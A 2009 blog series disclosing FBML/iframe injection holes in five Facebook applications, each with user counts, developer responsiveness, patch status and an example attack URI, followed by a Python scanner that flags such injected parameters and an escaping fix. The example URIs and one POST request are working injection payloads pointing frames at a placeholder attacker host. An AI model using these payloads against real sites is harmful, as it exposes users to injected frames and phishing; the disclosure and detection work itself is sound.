Sep. 22, 2009

Posted by in FAXX Hacks | No comments

FAXX Hack: Trazzler

Facebook Verified Application

Current Monthly Active Users: 5,448

Current Rank on Application Leaderboard: 2,833

Application Developer: Trazzler

Responsiveness: The developers at Trazzler have been responsive, and I’ve been working with them to try and get the hole patched. I was honestly a little disappointed by the information they got from Facebook about the hole, but that’s for another post.

Vulnerability Status: Patched Sep. 24 (originally listed as Unpatched)

Example URI: http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D'http%3A%2F%2FEVILURI%2F'%3E

Notes: See the leaderboard rank of Trazzler? I chose to check it after looking at the list of Facebook Verified Applications, which means AppData lists around 2,800 applications I haven’t checked which have higher MAU than Trazzler. This Month of Facebook Bugs only begins to scratch the surface of Facebook applications.

Sep. 21, 2009

Posted by in FAXX Hacks | No comments

FAXX Hack: My Zoo

Current Monthly Active Users: 953,784

Current Rank on Application Leaderboard: 124

Application Developer: Eyrewood Studios

Responsiveness: I did not find direct contact information for the developer, so I forwarded this request to Facebook, and the hole has since been patched.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E

Sep. 20, 2009

Posted by in FAXX Hacks | No comments

FAXX Hack: Hugged

Facebook Verified Application

Current Monthly Active Users: 3,169,974

Current Rank on Application Leaderboard: 51

Application Developer: Manakki

Responsiveness: I did not receive any responses from Manakki, but they did patch the hole – the example URI below now brings up a page that says, “Please go away.”

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Sep. 19, 2009

Posted by in FAXX Hacks | 1 comment

FAXX Hack: SocialCalendar

Facebook Verified Application

Current Monthly Active Users: 1,661,572

Current Rank on Application Leaderboard: 93

Application Developer: SocialCalendar.com

Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1

Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query="/><fb:iframe src="http://eviluri/">&sc_op=showView&sc_v=movieSearch

Sep. 19, 2009

Posted by in FAXX Hacks | No comments

FAXX Hack: Circle of Friends

Posting these is not an automated process, and I was on the road most of yesterday, so again I apologize for being a day late. This counts as Friday’s FAXX Hack.

Current Monthly Active Users: 635,797

Current Rank on Application Leaderboard: 172

Application Developer: Bantr

Responsiveness: I received an e-mail about a day after reporting the hole to let me know that Bantr had fixed it.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/friendcircles/circle_settings.php?circle_id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

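Every example URI in these posts follows the same pattern: a request parameter is echoed into the application's FBML output without escaping, so a quote and a closing bracket in the parameter end the surrounding attribute and a `<fb:iframe>` pointing at an outside host is rendered in the canvas page. The scanner below is an added example written for this listing; it is not code from the author or from any of the applications named above. It takes request URIs (or a form-encoded POST body, as in the SocialCalendar example), percent-decodes each parameter a bounded number of times so double-encoded payloads such as `%5C%27` are still seen, and reports any parameter that opens an FBML tag, together with the host its `src=` attribute names. The `fbml_escape` helper shows the mitigation side: HTML-escaping the value before it is emitted leaves nothing for the tag pattern to match. The sample inputs are the five Example URIs quoted in the posts above plus two benign requests constructed for contrast; `EVILURI`/`eviluri` are the placeholder hosts the posts use.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Sample inputs: the five "Example URI" strings quoted in the posts above,
# followed by two benign requests constructed for contrast.
SAMPLE_REQUESTS = [
    "http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D'http%3A%2F%2FEVILURI%2F'%3E",
    "http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E",
    "http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E",
    "http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1",
    "http://apps.facebook.com/friendcircles/circle_settings.php?circle_id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E",
    "http://apps.facebook.com/myownzoo/friends.php?uid=1527549541",          # constructed, benign
    "http://apps.facebook.com/socialcal/?sc_op=showView&sc_v=movieList&sc_page=1",  # constructed, benign
]

# An FBML tag opener such as "<fb:iframe"; the tag name is captured.
FBML_TAG = re.compile(r"<\s*fb\s*:\s*([a-z][a-z0-9-]*)", re.IGNORECASE)
# Heuristic: the host named in a src= attribute, so the report says where the frame points.
SRC_HOST = re.compile(r"""src\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_query(query):
    """Return one finding per parameter whose decoded value opens an FBML tag.

    Accepts a URL query string or a form-encoded POST body, so the POST
    example from the SocialCalendar post is handled the same way."""
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        tag = FBML_TAG.search(value)
        if not tag:
            continue
        host = SRC_HOST.search(value, tag.end())
        findings.append({
            "param": name,
            "tag": "fb:" + tag.group(1).lower(),
            "src_host": host.group(1) if host else None,
        })
    return findings


def scan_request(url):
    """Scan the query string of a full request URI."""
    return scan_query(urlsplit(url).query)


def scan_requests(urls):
    """Scan a batch of request URIs (for example, lines pulled from an access log)."""
    results = []
    for url in urls:
        for finding in scan_request(url):
            finding["url"] = url
            results.append(finding)
    return results


def fbml_escape(value):
    """Mitigation: HTML-escape a parameter before emitting it into FBML/HTML output,
    so '<' and quote characters can no longer open a tag or break out of an attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f['param']!r} in {f['url'].split('?')[0]} -> {f['tag']} src={f['src_host']}")
```

The host extraction is only a convenience for triage; the finding that matters is an FBML tag opener inside a parameter that the application never intended to hold markup. Applying `fbml_escape` (or the equivalent in the application's own templating layer) at the point where the parameter is written into the page is the fix that closes every hole in this list.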